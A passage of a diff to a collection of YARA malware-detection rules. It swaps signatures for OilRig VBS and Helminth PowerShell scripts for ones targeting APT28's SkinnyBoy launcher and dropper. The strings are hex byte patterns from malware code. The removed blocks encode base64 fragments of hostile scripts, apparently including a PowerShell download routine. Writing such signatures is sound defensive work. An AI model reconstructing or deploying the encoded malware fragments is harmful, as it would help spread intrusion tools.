ff 83 c4 0c 03 c7 56 8b b5 e4 fe ff ff 56 50 e8 49 6e 00 00 83 c4 0c 56 6a 00 ff 15 b4 b0 00 10 50 a1 b8 b0 00 10 ff d0 57 8d 85 f0 fe ff ff 6a 00 50 e8 96 32 00 00 83 c4 0c 8d 8d d4 fe ff ff 6a 01 ff b5 e0 fe ff ff ff b5 d0 fe ff ff e8 8a f3 ff ff 85 c0 0f 84 7c 03 00 00 8b 85 d4 fe ff ff 8b 3d e8 b1 00 10 85 c0 74 03 50 ff d7 8b 85 d8 fe ff ff 85 }
+		$s2 = { 33 d2 8b c1 b9 00 00 20 00 f7 f1 33 c9 89 8d e4 fe ff ff 3b ca 89 95 b8 fe ff ff 1b d2 f7 da 03 d0 89 95 c4 fe ff ff 0f 84 98 02 00 00 8b ff 8b b5 b8 fe ff ff 85 f6 74 09 8d 42 ff 8b fe 3b c8 74 05 bf 00 00 20 00 57 6a 08 ff 15 b4 b0 00 10 50 ff 15 ec b0 00 10 8b 8d e4 fe ff ff 0f af cf 03 8d d0 fe ff ff 57 8b f0 51 56 89 b5 ec fe ff ff e8 c9 6c 00 00 83 c4 0c 8d 85 f1 fe ff ff 68 03 01 00 00 6a 00 50 c6 85 f0 fe ff ff 00 e8 1c 31 00 00 8b 85 e4 fe ff ff 83 c4 0c 40 6a 00 ff b5 c4 fe ff ff 8b d0 8d 8d f0 fe ff ff 89 85 e4 fe ff ff e8 27 f5 ff ff 83 c4 08 8d 85 e0 fe ff ff 50 6a 00 6a 01 57 56 c7 85 e0 fe ff ff 00 00 00 00 ff 15 24 b0 00 10 85 c0 74 4c ff b5 e0 fe ff ff 6a 08 ff 15 b4 b0 00 10 50 ff 15 ec b0 00 10 8b f0 8d 85 e0 fe ff ff 50 56 6a 01 57 8b bd ec fe ff ff 57 ff 15 24 b0 00 10 57 6a 00 ff 15 b4 b0 00 10 50 a1 b8 b0 00 10 ff d0 8b bd e0 fe ff ff 89 b5 ec fe ff ff 8d b5 f0 fe ff ff 8d 4e 01 8a 06 46 84 c0 75 f9 2b f1 8d 04 3e 50 6a 08 89 85 c8 fe ff ff ff 15 b4 b0 00 10 50 ff 15 ec b0 00 10 56 8d 8d f0 fe ff ff 51 50 89 85 bc fe ff ff e8 d8 6b 00 00 8b 8d bc fe ff ff 83 c4 0c 03 ce 57 8b bd ec fe ff ff 57 51 e8 bf 6b 00 00 83 c4 0c 57 6a 00 ff 15 b4 b0 00 10 50 ff 15 b8 b0 00 10 56 8d 85 f0 fe ff ff 6a 00 50 e8 0d 30 00 00 8b b5 c0 fe ff ff 8b bd bc fe ff ff 83 c4 0c 8d 8d d4 fe ff ff 56 ff b5 c8 fe ff ff 57 e8 fb f0 ff ff 85 c0 0f 84 c9 00 00 00 85 f6 0f 84 c1 00 00 00 8b 85 d4 fe ff ff 8b 35 e8 b1 00 10 85 }
+		$s3 = { 55 8b ec 83 e4 f8 81 ec 34 02 00 00 a1 00 00 01 10 33 c4 89 84 24 30 02 00 00 53 56 57 6a ff ff 35 28 1b 01 10 ff 15 4c b0 00 10 ff 35 28 1b 01 10 ff 15 80 b0 00 10 8b 35 b8 b0 00 10 8b 3d b4 b0 00 10 8d 44 24 10 50 8d 54 24 10 c7 44 24 10 00 00 00 00 c7 44 24 14 00 00 00 00 e8 df 0a 00 00 8b 4c 24 14 83 c4 04 85 c9 0f 84 e6 02 00 00 8b 54 24 0c 33 c0 33 db c7 44 24 20 00 00 00 00 89 44 24 1c 85 c9 0f 84 c2 02 00 00 8d 64 24 00 8b 34 13 8d 04 13 56 6a 08 ff d7 50 ff 15 ec b0 00 10 8b c8 8b 44 24 0c 83 c0 04 56 03 c3 50 51 89 4c 24 24 e8 a7 7e 00 00 8b 44 24 18 03 c3 83 c4 0c 8b 44 06 04 50 6a 08 89 44 24 1c ff d7 50 ff 15 ec b0 00 10 ff 74 24 14 8b f8 8b 44 24 10 03 c3 83 c6 08 03 c6 50 57 e8 72 7e 00 00 83 c4 0c 68 04 01 00 00 6a 08 ff 15 b4 b0 00 10 50 ff 15 ec b0 00 10 68 00 00 00 f0 6a 18 6a 00 8b f0 6a 00 8d 44 24 34 50 c7 44 24 38 00 00 00 00 c7 44 24 3c 00 00 00 00 ff 15 18 b0 00 10 }
+		$s4 = { ff 15 a4 b0 00 10 8d 44 24 28 50 6a 00 6a 00 68 0c 80 00 00 ff 74 24 34 ff 15 14 b0 00 10 ff 15 a4 b0 00 10 6a 00 ff 74 24 18 57 ff 74 24 34 ff 15 0c b0 00 10 ff 15 a4 b0 00 10 6a 00 8d 44 24 30 50 56 6a 02 ff 74 24 38 c7 44 24 40 04 01 00 00 ff 15 10 b0 00 10 ff 74 24 28 ff 15 00 b0 00 10 6a 00 ff 74 24 28 ff 15 04 b0 00 10 8b 54 24 2c 8b 44 24 18 }
+		$s5 = { 50 68 04 01 00 00 ff 15 a8 b0 00 10 8d 44 24 30 50 ff 15 a0 b1 00 10 68 18 ee 00 10 8d 44 24 34 50 ff 15 9c b0 00 10 b8 4d 5a 00 00 66 39 07 0f 85 b2 00 00 00 6a 00 68 80 00 00 00 6a 04 6a 00 6a 02 68 00 00 00 40 8d 44 24 48 50 ff 15 40 b0 00 10 8b f0 ff 15 a4 b0 00 10 83 fe }
+		$s6 = { 6a 00 8d 44 24 28 50 ff 74 24 1c c7 44 24 30 00 00 00 00 57 56 ff 15 38 b0 00 10 56 ff 15 44 b0 00 10 68 80 00 00 00 8d 44 24 34 50 ff 15 48 b0 00 10 8d 44 24 30 50 ff 15 a4 b1 00 10 85 c0 74 2d 8d 44 24 30 50 ff 15 b0 b0 00 10 8b f0 6a 01 56 ff 15 a0 b0 00 10 8d 4c 24 20 51 a3 20 1b 01 10 ff d0 56 89 44 24 20 ff 15 f4 b0 00 10 e8 ad f3 ff ff 57 8b 3d b4 b0 00 10 6a 00 ff d7 8b 35 b8 b0 00 10 50 ff d6 ff 74 24 18 6a 00 ff d7 50 ff d6 8b 44 24 1c 85 c0 74 12 8b 54 24 20 50 b9 4c ef 00 10 e8 77 0c 00 00 83 c4 04 8b 54 24 0c 8b 0c 13 8d 04 13 8d 04 19 83 c3 08 8b 44 10 04 03 c1 03 d8 3b 5c 24 10 0f 82 42 fd ff ff 52 6a 00 ff d7 50 ff d6 68 00 dd 6d 00 ff 35 28 1b 01 10 ff 15 4c b0 00 10 85 c0 0f 85 d4 fc ff ff }
 
 	condition:
-		uint32( 0 ) == 0x464c457f and filesize > 30KB and 4 of them
+		uint16( 0 ) == 0x5a4d and filesize > 40KB and 5 of ( $s* )
 }
-rule ARKBIRD_SOLG_APT_Oilrig_VBS_2016_1 : FILE
+rule ARKBIRD_SOLG_MAL_Skinnyboy_Launcher_Jun_2021_1 : FILE
 {
 	meta:
-		description = "Detect VBS script in base 64 used by OilRig (2016)"
+		description = "Detect the Launcher of SkinnyBoy"
 		author = "Arkbird_SOLG"
-		id = "5cc3a3f1-4f2f-56c4-af69-8652d22b6730"
-		date = "2020-08-26"
-		modified = "2021-07-13"
-		reference = "https://twitter.com/Arkbird_SOLG/status/1298758788028264450"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-08-26/APT_OilRig_2016.yar#L4-L23"
+		id = "4e69cba4-92ef-5ea5-95d8-b22ed77f515c"
+		date = "2021-06-05"
+		modified = "2021-06-06"
+		reference = "https://cluster25.io/wp-content/uploads/2021/05/2021-05_FancyBear.pdf"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-06-06/APT28/MAL_SkinnyBoy_Launcher_Jun_2021_1.yara#L1-L19"
 		license_url = "N/A"
-		logic_hash = "a6c42c46c80ca79b01aa0475c823aeccef416a0f8c2f58db95392cbe125b2fad"
+		logic_hash = "4d5906832a1bc90552255ada1cc9e3c7cd3e14e4b0cb11b1bf2c11c57bca8ad8"
 		score = 75
-		quality = 63
+		quality = 75
 		tags = "FILE"
-		hash1 = "1edbb818ea75919bb70bd2496e789e89d26c94cdf65ab61ebb5f1403d45d323c"
-		hash2 = "1191d5c1dd7f6ac38b8d72bee37415b3ff1c28a8f907971443ac3a36906e8bf5"
+		hash1 = "2a652721243f29e82bdf57b565208c59937bbb6af4ab51e7b6ba7ed270ea6bce"
+		tlp = "White"
+		adversary = "APT28"
 
 	strings:
-		$block1 = { 53 45 39 4e 52 54 30 69 4a 58 42 31 59 6d 78 70 59 79 56 63 54 47 6c 69 63 6d 46 79 61 57 56 7a 58 43 49 }
-		$block2 = { 43 6c 4e 46 55 6c 5a 46 55 6a 30 69 61 48 52 30 }
-		$block3 = { 56 34 4c 6d 46 7a 63 48 67 2f 63 6d 56 78 }
-		$block4 = { 6a 30 69 63 47 39 33 5a 58 4a 7a 61 47 56 73 62 43 41 69 49 69 5a 37 4a 48 64 6a 50 53 68 75 5a 58 63 74 62 32 4a 71 5a 57 4e 30 49 46 4e 35 63 33 52 6c 62 53 35 4f 5a 58 51 75 56 32 56 69 51 32 78 70 5a 57 35 30 4b 54 73 6b 64 32 4d 75 56 58 4e 6c 52 47 56 6d 59 58 56 73 64 45 4e 79 5a 57 52 6c 62 6e 52 70 59 57 78 7a 50 53 52 30 63 6e 56 6c 4f 79 52 33 59 79 35 49 5a 57 46 6b 5a 58 4a 7a 4c 6d 46 6b 5a 43 67 6e 51 57 4e 6a 5a 58 42 30 4a 79 77 6e 4b 69 38 71 4a 79 6b 37 4a 48 64 6a 4c 6b 68 6c 59 57 52 6c 63 6e 4d 75 59 57 52 6b 4b 43 64 56 63 32 56 79 4c 55 46 6e 5a 57 35 30 4a 79 77 6e 54 57 6c 6a 63 6d 39 7a 62 32 5a 30 49 45 4a 4a 56 46 4d 76 4e 79 34 33 4a 79 6b 37 64 32 68 70 62 47 55 6f 4d 53 6c 37 64 48 4a 35 65 79 52 79 50 55 64 6c 64 43 31 53 59 57 35 6b 62 32 30 37 4a 48 64 6a 4c 6b 52 76 64 32 35 73 62 32 46 6b 52 6d 6c 73 }
-		$block5 = { 69 49 4e 43 6b 4e 79 5a 57 46 30 5a 55 39 69 61 6d 56 6a 64 43 67 69 56 31 4e 6a 63 6d 6c 77 64 43 35 54 61 47 56 73 62 43 49 70 4c 6c 4a 31 62 69 42 53 5a 58 42 73 59 57 [1-4] 45 52 33 62 69 77 69 4c 56 38 [1-4] 4a 6b 64 32 34 69 4b 53}
-		$block6 = { 30 69 49 69 49 4e 43 6b 4e 79 5a 57 46 30 5a 55 39 69 61 6d 56 6a 64 43 67 69 56 31 4e 6a 63 6d 6c 77 64 43 35 54 61 47 56 73 62 43 49 70 4c 6c 4a 31 62 69 42 53 5a 58 42 73 59 57 4e 6c 4b 45 52 76 64 32 35 73 62 32 46 6b 52 58 68 6c 59 33 56 30 5a 53 77 69 4c 56 38 69 4c 43 4a 69 59 58 51 }
-		$block7 = { 51 70 72 62 32 31 6a 50 53 4a 77 62 33 64 6c 63 6e 4e 6f 5a 57 78 73 49 43 31 6c 65 47 56 6a 49 45 4a 35 63 47 46 7a 63 79 41 74 52 6d 6c 73 5a 53 41 69 4a 6b }
-		$block8 = { 0a b7 9a b5 e3 9b 8d e7 2d 59 27 2b 8a 9b 52 85 e9 65 46 e9 [1-4] d4 }
+		$s1 = { 55 8b ec 83 e4 f8 81 ec bc 06 00 00 a1 00 e0 40 00 33 c4 89 84 24 b8 06 00 00 53 56 57 33 c0 68 06 02 00 00 50 66 89 84 24 b8 02 00 00 8d 84 24 ba 02 00 00 50 8b f1 e8 64 31 00 00 8b 1d 28 90 40 00 0f 57 c0 83 c4 0c 8d 84 24 9c 02 00 00 50 c7 84 24 a0 02 00 00 79 00 00 00 66 0f d6 84 24 a4 02 00 00 66 0f d6 84 24 ac 02 00 00 c7 84 24 78 02 00 00 57 00 00 00 66 0f d6 84 24 7c 02 00 00 66 0f d6 84 24 84 02 00 00 ff d3 8b d0 33 c9 89 15 38 fb 40 00 85 d2 74 1b 8d 9b 00 00 00 00 66 8b 84 4c 74 02 00 00 66 31 84 4c 9c 02 00 00 41 3b ca 72 eb a1 80 cd 40 00 89 84 24 88 02 00 00 0f b7 05 84 cd 40 00 66 89 84 24 8c 02 00 00 a1 88 cd 40 00 89 84 24 74 02 00 00 0f b7 05 8c cd 40 00 66 89 84 24 78 02 00 00 0f 57 c0 8d 84 24 88 02 00 00 50 66 0f d6 84 24 92 02 00 00 c7 84 24 9a 02 00 00 00 00 00 00 66 c7 84 24 9e 02 00 00 00 00 66 0f d6 84 24 7e 02 00 00 c7 84 24 86 02 00 00 00 00 00 00 66 c7 84 24 8a 02 00 00 00 00 ff d3 8b d0 33 c9 89 15 38 fb 40 00 }
+		$s2 = { 66 8b 84 4c 74 02 00 00 66 31 84 4c 88 02 00 00 41 3b ca 72 eb 6a 64 6a 08 ff 15 30 90 40 00 50 ff 15 34 90 40 00 8b 1d 3c 90 40 00 89 44 24 0c 56 8d 84 24 b4 02 00 00 50 ff d3 8b 3d 44 91 40 00 8d 84 24 b0 02 00 00 50 ff d7 68 90 cd 40 00 8d 84 24 b4 02 00 00 50 ff d3 8d 44 24 20 50 8d 84 24 b4 02 00 00 50 ff 15 40 90 40 00 8b f0 8d 84 24 b0 02 00 00 50 89 74 24 14 ff 15 40 91 40 00 8d 84 24 b0 02 00 00 50 ff d7 83 fe ff 0f 84 21 02 00 00 8b 35 2c 90 40 00 8d 9b 00 00 00 00 8d 84 24 9c 02 00 00 50 8d 44 24 50 50 ff d6 85 }
+		$s3 = { ff 15 20 90 40 00 8d 44 24 14 50 6a 00 6a 00 68 0c 80 00 00 ff 74 24 28 ff 15 04 90 40 00 ff 15 20 90 40 00 6a 00 56 8d 44 24 54 50 ff 74 24 20 ff 15 14 90 40 00 ff 15 20 90 40 00 6a 00 8d 44 24 20 50 ff 74 24 14 c7 44 24 28 64 00 00 00 6a 02 ff 74 24 24 ff 15 10 90 40 00 ff 74 24 14 ff 15 00 90 40 00 6a 00 ff 74 24 1c ff 15 0c 90 40 00 8b 74 24 1c 8b 4c 24 0c ba 90 ed 40 00 83 ee }
+		$s4 = { 0f b7 8c 05 f8 fd ff ff 66 31 8c 05 f8 fe ff ff 0f b7 8c 05 fa fd ff ff 66 31 8c 05 fa fe ff ff 0f b7 8c 05 fc fd ff ff 66 31 8c 05 fc fe ff ff 0f b7 8c 05 fe fd ff ff 66 31 8c 05 fe fe ff ff 83 c0 08 3d 00 01 00 00 72 b6 56 8d 85 f8 fe ff ff 50 8d 85 f0 fb ff ff 68 08 02 00 00 50 e8 ed 04 00 00 6a 44 8d 85 98 fb ff ff 6a 00 50 e8 ed 31 00 00 83 c4 1c 8d 85 e0 fb ff ff 50 8d 85 98 fb ff ff 50 6a 00 6a 00 68 00 00 00 08 6a 00 6a 00 6a 00 8d 85 f0 fb ff ff 50 6a 00 c7 85 98 fb ff ff 44 00 00 00 ff 15 38 90 40 00 8b 4d fc 33 cd 5e e8 b9 04 00 00 8b e5 }
+		$s5 = { 55 8b ec 81 ec 6c 04 00 00 a1 00 e0 40 00 33 c5 89 45 fc 56 33 c0 68 06 02 00 00 50 66 89 85 f0 fb ff ff 8d 85 f2 fb ff ff 50 8b f1 e8 8f 33 00 00 68 04 01 00 00 8d 85 f0 fb ff ff 6a 00 50 e8 7c 33 00 00 83 c4 18 56 ff 15 48 91 40 00 85 c0 0f 84 b6 01 00 00 b8 69 00 00 00 68 d2 00 00 00 66 89 85 24 ff ff ff 8d 85 26 ff ff ff 6a 00 50 c7 85 f8 fe ff ff 1f 00 16 00 c7 85 fc fe ff ff 0b 00 22 00 c7 85 00 ff ff ff 78 00 7c 00 c7 85 04 ff ff ff 00 00 55 00 c7 85 08 ff ff ff 5b 00 2e 00 c7 85 0c ff ff ff 3f 00 03 00 c7 85 10 ff ff ff 04 00 04 00 c7 85 14 ff ff ff 0d 00 15 00 c7 85 18 ff ff ff 47 00 44 00 c7 85 1c ff ff ff 47 00 14 00 c7 85 20 ff ff ff 09 00 68 00 e8 dd 32 00 00 f3 0f 7e 05 48 cd 40 00 66 0f d6 85 f8 fd ff ff f3 0f 7e 05 50 cd 40 00 66 0f d6 85 00 fe ff ff f3 0f 7e 05 58 cd 40 00 66 0f d6 85 08 fe ff ff f3 0f 7e 05 60 cd 40 00 66 0f d6 85 10 fe ff ff f3 0f 7e 05 68 cd 40 00 68 d0 00 00 00 66 0f d6 85 18 fe ff ff f3 0f 7e 05 70 cd 40 00 8d 85 28 fe ff ff 6a 00 50 66 0f d6 85 20 fe ff ff e8 6a 32 00 00 83 c4 18 33 }
+		$s6 = { 0f b7 8c 05 f8 fd ff ff 66 31 8c 05 f8 fe ff ff 0f b7 8c 05 fa fd ff ff 66 31 8c 05 fa fe ff ff 0f b7 8c 05 fc fd ff ff 66 31 8c 05 fc fe ff ff 0f b7 8c 05 fe fd ff ff 66 31 8c 05 fe fe ff ff 83 c0 08 3d 00 01 00 00 72 b6 56 8d 85 f8 fe ff ff 50 8d 85 f0 fb ff ff 68 08 02 00 00 50 e8 ed 04 00 00 6a 44 8d 85 98 fb ff ff 6a 00 50 e8 ed 31 00 00 83 c4 1c 8d 85 e0 fb ff ff 50 8d 85 98 fb ff ff 50 6a 00 6a 00 68 00 00 00 08 6a 00 6a 00 6a 00 8d 85 f0 fb ff ff 50 6a 00 c7 85 98 fb ff ff 44 00 00 00 ff 15 38 90 40 00 8b 4d fc 33 cd 5e e8 b9 04 00 00 8b e5 }
 
 	condition:
-		filesize < 2KB and 6 of them
+		uint16( 0 ) == 0x5a4d and filesize > 40KB and 5 of ( $s* )
 }
-rule ARKBIRD_SOLG_APT_Oilrig_PSH_Helminth_2016_1 : FILE
+rule ARKBIRD_SOLG_MAL_Skinnyboy_Dropper_Jun_2021_1 : FILE
 {
 	meta:
-		description = "Detect Powershell script Helminth in base 64 used by OilRig (2016)"
+		description = "Detect SkinnyBoy Dropper"
 		author = "Arkbird_SOLG"
-		id = "782503c2-a292-505c-b513-79cbbd381124"
-		date = "2020-08-26"
-		modified = "2021-07-13"
-		reference = "https://twitter.com/Arkbird_SOLG/status/1298758788028264450"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-08-26/APT_OilRig_2016.yar#L25-L45"
+		id = "1ea4cfe7-d44d-5cdb-8436-cb2b09dd2e56"
+		date = "2021-05-01"
+		modified = "2021-06-06"
+		reference = "https://cluster25.io/wp-content/uploads/2021/05/2021-05_FancyBear.pdf"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-06-06/APT28/MAL_SkinnyBoy_Dropper_Jun_2021_1.yara#L1-L19"
 		license_url = "N/A"
-		logic_hash = "0216015765f5abdb6ccf7643344aead51e4eebb19fd947f9484ce5dc6696d4d5"
+		logic_hash = "805bc5bb5833a75d68df2a6ce828d70b2257809a3699fdca5e621aae6bdc5070"
 		score = 75
-		quality = 61
+		quality = 73
 		tags = "FILE"
-		hash1 = "1edbb818ea75919bb70bd2496e789e89d26c94cdf65ab61ebb5f1403d45d323c"
-		hash2 = "1191d5c1dd7f6ac38b8d72bee37415b3ff1c28a8f907971443ac3a36906e8bf5"
+		hash1 = "12331809c3e03d84498f428a37a28cf6cbb1dafe98c36463593ad12898c588c9"
+		tlp = "White"
+		adversary = "APT28"
 
 	strings:
-		$block1 = { 70 74 65 57 6c 6b 49 44 30 67 4a 79 4d 6a 49 79 63 67 44 51 6f 67 4a 47 64 73 62 32 4a 68 62 44 70 74 65 57 68 76 62 57 55 67 50 53 41 69 4a 47 56 75 64 6a 70 51 64 }
-		$block2 = { 41 67 ?? ?? 42 6c 62 48 4e 6c 61 57 59 6f 4a 47 31 35 5a 6d 78 68 5a 7a 4d 67 4c 57 56 78 49 44 49 70 49 41 30 4b 49 43 41 67 49 48 73 67 44 51 6f 67 49 43 41 67 49 43 41 67 49 43 67 6e 64 33 63 6e 4b 79 52 6e 62 47 39 69 59 57 77 36 62 58 6c 70 5a 43 73 6b 59 32 31 6b 61 57 51 72 4a 48 42 68 63 6e 52 70 5a 43 73 6f }
-		$block3 = { 6a 61 47 46 79 58 53 42 62 61 57 35 30 58 53 41 6b 64 47 31 77 57 7a 42 64 4b 53 41 72 49 43 }
-		$block4 = { 43 52 6a 62 6e 51 67 4c 57 56 78 49 44 49 31 4b 53 6b 67 44 51 6f 67 49 43 41 67 65 79 41 }
-		$block5 = { 5a 6c 52 45 35 54 49 43 67 6b 5a 43 6b 67 44 51 70 37 49 41 30 4b 43 53 52 6a 62 6e 51 67 50 53 41 77 49 41 30 4b 43 58 64 6f 61 57 78 6c 49 43 67 6b 59 32 35 30 49 43 31 73 64 43 41 79 4d 43 6b 67 44 51 6f 4a 65 79 41 4e 43 67 6b 4a 64 48 4a 35 49 41 30 4b 43 51 6c 37 }
-		$block6 = { 4b 49 43 41 67 49 43 41 67 49 43 41 6b 61 53 73 72 49 41 30 4b 49 43 41 67 49 48 30 67 44 51 6f 67 49 43 41 67 61 57 59 6f 4a 48 4a 6c 64 43 41 74 5a 58 45 67 4d 53 6b 67 44 51 6f 67 49 43 41 }
-		$block7 = { 77 36 62 58 6c 6d 62 47 46 6e 49 44 30 67 4d 43 41 4e 43 69 41 67 49 43 42 39 49 41 30 4b 49 43 41 67 49 47 56 73 63 32 56 70 5a 69 41 6f 4a 47 64 73 62 32 4a 68 62 44 70 74 65 57 5a 73 59 57 63 67 4c 57 56 78 49 44 45 70 49 41 30 4b 49 43 41 67 49 48 73 67 44 51 6f 67 49 43 41 67 49 43 41 67 49 43 52 30 62 58 41 67 50 53 41 6b 62 58 6c 6b 59 58 52 68 4c 6c 4e 77 62 47 6c 30 4b 43 63 75 4a 79 6b 67 44 51 6f 67 49 43 41 67 49 43 41 67 49 46 74 54 65 58 4e 30 5a 57 30 75 53 55 38 75 52 6d 6c 73 5a 56 30 36 4f 6b 46 77 63 47 56 75 5a 45 46 73 62 46 52 6c 65 48 51 6f 4a 47 64 73 62 32 4a 68 62 44 70 74 65 57 68 76 62 57 55 72 4a 33 52 77 58 43 63 72 4a 47 64 73 62 32 4a 68 62 44 70 6d 61 57 78 6c 62 6d 46 74 }
-		$block8 = { 4a 47 6b 72 4b 79 41 4e 43 69 41 67 49 43 42 39 49 41 30 4b 49 48 30 67 44 51 6f 67 44 51 6f 67 5a 6e 56 75 59 33 52 70 62 32 34 67 52 32 56 30 53 55 [1-10] 4e 43 69 41 67 49 43 41 6b 5a 32 78 76 59 6d 46 73 4f 6d 31 35 61 57 51 67 50 53 42 54 5a 57 35 6b 55 6d 56 6a 5a 57 6c 32 5a 55 52 4f 55 79 41 6f 4b 45 64 6c 64 46 4e 31 59 69 41 77 4b 53 73 6e 4d 7a 41 6e 4b 53 41 4e 43 69 42 39 49 41 30 4b 49 41 30 4b 49 47 5a 31 62 6d 4e 30 61 57 39 [1-10] 56 52 6f 61 58 4e 47}
-		$block9 = { 73 67 44 51 6f 4a 43 57 31 6b 49 43 31 47 62 33 4a 6a 5a 53 41 6f 4a 47 64 73 62 32 4a 68 62 44 70 74 65 57 68 76 62 57 55 72 4a 33 52 77 58 43 63 70 49 41 30 4b 43 51 6c 48 5a 58 52 4a 52 43 41 4e 43 67 6b 4a 51 32 68 68 62 6d 64 6c 56 47 68 70 63 30 5a 70 62 47 55 67 4a 47 64 73 62 32 4a 68 62 44 70 74 65 57 6c 6b 49 41 30 4b 49 43 41 67 49 48 30 67 44 51 6f 67 66 53 41 4e 43 69 42 6d 64 57 35 6a 64 47 6c 76 62 69 42 74 59 57 6c 75 49 41 30 4b }
+		$s1 = { 55 8b ec b8 48 12 00 00 e8 a3 52 00 00 a1 00 d0 40 00 33 c5 89 45 fc 56 57 68 08 02 00 00 8d 85 cc ed ff ff 50 51 ff 15 2c 80 40 00 6a 00 68 80 00 00 00 6a 03 6a 00 6a 01 68 00 00 00 80 8d 85 cc ed ff ff 50 c7 85 b8 ed ff ff 00 00 00 00 ff 15 18 80 40 00 8b f0 ff 15 1c 80 40 00 8b f8 83 fe ff 74 12 6a 00 56 ff 15 58 80 40 00 56 8b f8 ff 15 20 80 40 00 8d 85 c8 ed ff ff 50 8d 95 b8 ed ff ff 8d 8d cc ed ff ff 89 bd c8 ed ff ff e8 bc fd ff ff 8b bd b8 ed ff ff b8 4d 5a 00 00 83 c4 04 66 39 07 74 1b 68 c1 00 00 00 ff 15 34 80 40 00 5f 5e 8b 4d fc 33 cd e8 fe 08 00 00 8b e5 }
+		$s2 = { 8b 47 3c 81 3c 07 50 45 00 00 75 d9 8b 47 1c 8b b5 c8 ed ff ff 8b 4f 20 2b f0 85 c9 74 04 8b f1 2b f0 53 56 6a 08 ff 15 0c 80 40 00 50 ff 15 08 80 40 00 8b 4f 1c 56 03 cf 8b d8 51 53 89 9d c4 ed ff ff e8 96 5d 00 00 68 08 02 00 00 8d 85 f4 f9 ff ff 6a 00 50 e8 33 25 00 00 83 c4 18 8d 85 f4 f9 ff ff 50 6a 00 6a 00 68 1c 80 00 00 6a 00 ff 15 30 81 40 00 b8 18 00 00 00 68 ee 00 00 00 66 89 85 0c fc ff ff 8d 85 0e fc ff ff 6a 00 50 c7 85 fc fb ff ff 00 00 3f 00 c7 85 00 fc ff ff 47 00 5b 00 c7 85 04 fc ff ff 09 00 19 00 c7 85 08 fc ff ff 08 00 0d 00 e8 d1 24 00 00 f3 0f 7e 05 c4 bd 40 00 a1 d4 bd 40 00 68 ec 00 00 00 89 85 0c ff ff ff 66 0f d6 85 fc fe ff ff f3 0f 7e 05 cc bd 40 00 8d 85 10 ff ff ff 6a 00 50 66 0f d6 85 04 ff ff ff e8 93 24 00 00 83 c4 18 33 }
+		$s3 = { 0f b7 8c 05 fc fe ff ff 66 31 8c 05 fc fb ff ff 0f b7 8c 05 fe fe ff ff 66 31 8c 05 fe fb ff ff 0f b7 8c 05 00 ff ff ff 66 31 8c 05 00 fc ff ff 0f b7 8c 05 02 ff ff ff 66 31 8c 05 02 fc ff ff 83 c0 08 3d 00 01 00 00 72 b6 8d 85 f4 f9 ff ff 50 ff 15 38 81 40 00 8d 85 fc fb ff ff 50 8d 85 f4 f9 ff ff 50 ff 15 40 80 40 00 6a 00 8d 85 f4 f9 ff ff 50 ff 15 28 80 40 00 68 d8 00 00 00 8d 85 24 fe ff ff 6a 00 50 c7 85 fc fd ff ff 1f 00 33 00 c7 85 00 fe ff ff 58 00 4e 00 c7 85 04 fe ff ff 5d 00 1b 00 c7 85 08 fe ff ff 59 00 27 00 c7 85 0c fe ff ff 70 00 2d 00 c7 85 10 fe ff ff 16 00 13 00 c7 85 14 fe ff ff 03 00 1c 00 c7 85 18 fe ff ff 0d 00 2a 00 c7 85 1c fe ff ff 07 00 51 00 c7 85 20 fe ff ff 08 00 13 00 e8 8f 23 00 00 f3 0f 7e 05 d8 bd 40 00 66 a1 00 be 40 00 66 0f d6 85 fc fe ff ff f3 0f 7e 05 e0 bd 40 00 66 0f d6 85 04 ff ff ff f3 0f 7e 05 e8 bd 40 00 66 0f d6 85 0c ff ff ff f3 0f 7e 05 f0 bd 40 00 68 d6 00 00 00 66 89 85 24 ff ff ff 66 0f d6 85 14 ff ff ff f3 0f 7e 05 f8 bd 40 00 8d 85 26 ff ff ff 6a 00 50 66 0f d6 85 1c ff ff ff e8 1f 23 00 00 83 c4 18 33 }
+		$s4 = { 0f b7 84 0d fc fe ff ff 66 31 84 0d fc fc ff ff 0f b7 84 0d fe fe ff ff 66 31 84 0d fe fc ff ff 0f b7 84 0d 00 ff ff ff 66 31 84 0d 00 fd ff ff 0f b7 84 0d 02 ff ff ff 66 31 84 0d 02 fd ff ff 83 c1 08 81 f9 00 01 00 00 72 b5 8d 85 f4 f9 ff ff 50 ff 15 38 81 40 00 8d 85 fc fc ff ff 50 8d 85 f4 f9 ff ff 50 ff 15 40 80 40 00 6a 00 6a 00 8d 85 c0 ed ff ff 50 6a 00 6a 01 56 53 8b 1d 00 80 40 00 c7 85 c0 ed ff ff 00 00 00 00 ff d3 ff b5 c0 ed ff ff 6a 08 ff 15 0c 80 40 00 50 ff 15 08 80 40 00 6a 00 6a 00 8d 8d c0 ed ff ff 51 50 6a 01 56 ff b5 c4 ed ff ff 89 85 bc ed ff ff ff d3 8b 85 c0 ed ff ff 6a 00 68 80 00 00 00 6a 04 6a 00 6a 02 89 85 b8 ed ff ff 68 00 00 00 40 8d 85 f4 f9 ff ff 50 ff 15 18 80 40 00 8b f0 ff 15 1c 80 40 00 8b 1d 38 80 40 00 83 fe ff 74 55 3d b7 00 00 00 75 0b 6a 00 6a 00 6a 00 56 ff }
+		$s5 = { 55 8b ec 83 ec 0c a1 00 d0 40 00 33 c5 89 45 fc 53 8b 5d 08 56 57 6a 00 68 80 00 00 00 6a 03 6a 00 6a 01 68 00 00 00 80 51 89 55 f4 ff 15 18 80 40 00 8b f0 ff 15 1c 80 40 00 8b f8 83 fe ff 74 67 83 ff 02 74 62 6a 00 56 ff 15 58 80 40 00 89 03 85 c0 74 47 c7 45 f8 00 00 00 00 ff 15 0c 80 40 00 ff 33 6a 08 50 ff 15 08 80 40 00 8b 4d f4 6a 00 89 01 8d 4d f8 51 ff 33 50 56 ff 15 14 80 40 00 56 ff 15 20 80 40 00 8b c7 5f 5e 5b 8b 4d fc 33 cd e8 d4 0a 00 00 8b e5 }
+		$s6 = { 54 56 71 51 41 41 4d 41 41 41 41 45 41 41 41 41 2f 2f }
 
 	condition:
-		filesize < 3KB and 7 of them
+		uint16( 0 ) == 0x5a4d and filesize > 40KB and 5 of ( $s* )
 }
-rule ARKBIRD_SOLG_Ran_Egregor_Oct_2020_1 : FILE
